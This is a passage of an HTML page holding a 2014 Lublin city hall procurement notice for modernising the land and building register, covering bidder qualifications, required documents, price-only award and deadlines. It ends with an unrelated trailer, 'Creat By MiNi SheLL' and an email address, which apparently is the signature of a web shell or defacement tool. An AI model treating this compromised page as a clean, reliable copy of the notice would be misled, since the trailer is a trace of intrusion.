9.15  Po upływie terminu, o którym mowa w art.24a ust.4 w/w ustawy, projekt operatu opisowo-kartograficznego staje się operatem ewidencji gruntów i budynków. Informację o tym Prezydent Miasta Lublin ogłasza w Dzienniku Urzędowym Województwa Lubelskiego.  
9.16  Redakcja mapy ewidencji gruntów i budynków. Po wykonaniu ostatecznej redakcji mapy należy sporządzić informatyczną postać mapy ewidencyjnej i zarysów numerycznych w postaci GeoTIF (w arkuszach).
9.17 Ostateczna aktualizacja bazy opisowej i graficznej ewidencji gruntów i budynków zawierająca zmiany po rozpatrzeniu uwag zgłoszonych przy wyłożeniu projektu operatu. Aktualizację bazy graficznej i opisowej dokona Wykonawca w siedzibie Zamawiającego na udostępnionym stanowisku pracy.
9.18 Kompletowanie materiałów.
Geodezyjna dokumentacja techniczna winna być skompletowana zgodnie z obowiązującymi w tym zakresie przepisami..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie ma wymogu wnoszenia wadium przez wykonawców.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jako spełniający warunki udziału w postępowaniu zostaną ocenieni wykonawcy którzy  wykażą wykonanie co najmniej jednego zadania z zakresu modernizacji ewidencji gruntów i budynków dla obszaru miejskiego o powierzchni nie mniejszej niż 100 ha, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jako spełniający warunki udziału w postępowaniu zostaną ocenieni wykonawcy którzy  wykażą dysponowanie co najmniej dwoma osobami posiadającymi wymagane uprawnienia zawodowe (świadectwa) w dziedzinie geodezji i kartografii nadane przez Głównego Geodetę Kraju, w zakresie określonym w art.43 pkt 2 ustawy z dnia 17 maja 1989r Prawo geodezyjne i kartograficzne (Dz.U.z 2010r Nr 193, poz.1287 ze zm.) tj. rozgraniczanie i podziały nieruchomości oraz sporządzanie dokumentacji do celów prawnych,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>1. Wykaz winien wskazywać wykonanie  co najmniej jednego zadania z zakresu modernizacji ewidencji gruntów i budynków dla obszaru miejskiego o powierzchni nie mniejszej niż 100 ha, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.                
2. Złożone poświadczenia winny potwierdzać należyte wykonanie    co najmniej jednego zadania z zakresu modernizacji ewidencji gruntów i budynków dla obszaru miejskiego o powierzchni nie mniejszej niż 100 ha, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz ofertowy w przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszystkich wykonawców składających ofertę wspólną.2.Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy Prawo zamówień publicznych (dotyczy również wspólników spółki cywilnej).3.Pełnomocnictwo do występowania w imieniu wykonawcy, w przypadku gdy dokumenty składające się na ofertę podpisuje osoba, której umocowanie do reprezentowania wykonawcy nie będzie wynikać z dokumentów załączonych do oferty.4.Wykonawca w sytuacji, gdy polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 5.Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w III.4.3), zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Strony przewidują następujące rodzaje i warunki zmiany treści umowy:
1) zmiana kwoty podatku VAT oraz wynagrodzenia brutto.
2) zmiana terminów wykonania zamówienia, w przypadku działania siły wyższej lub zdarzenia losowego, uniemożliwiających wykonanie prac w wyznaczonym terminie.     
2. Zmiany umowy przewidziane w pkt.1 dopuszczalne są na następujących warunkach: 
ad pkt.1) - kwota podatku VAT oraz wynagrodzenie brutto ulegną zmianie odpowiednio do przepisów prawa wprowadzających zmianę stawki podatku VAT,
ad pkt.2) - zmiana terminów wykonania zamówienia o okres działania siły wyższej oraz o czas potrzebny do usunięcia skutków tego działania lub o okres potrzebny do usunięcia skutków zdarzenia losowego uniemożliwiającego wykonanie prac.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lublin.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych Urzędu Miasta  Lublin, Plac Litewski 1, pokój nr 3 po dokonaniu wpłaty 5 zł w kasie UM lublin ul. Wieniawska 14 lub za zaliczeniem pocztowym (5zł+koszt przesyłki).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.06.2014 godzina 10:30, miejsce: Biuro Zamówień Publicznych Urzędu Miasta  Lublin, Plac Litewski 1, pokój nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Osobami upoważnionymi do kontaktowania się z wykonawcami są:
1.1. W zakresie przedmiotu zamówienia: Alina Parol - inspektor w Wydziale Geodezji Urzędu Miasta  Lublin, ul. Wieniawska 14, pok.504,  tel. (081) 466 21 11
1.2. W zakresie procedury: p. Małgorzata Kubiczek - Biuro Zamówień Publicznych Urzędu Miasta  Lublin, Plac Litewski 1, pokój nr 3, telefon 81 466 30 13.
2. Termin wykonania zamówienia -  do 31 maja 2015 r. tj
etap I - do dnia 15 listopada 2014r.
etap II - do dnia 31 maja 2015r.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com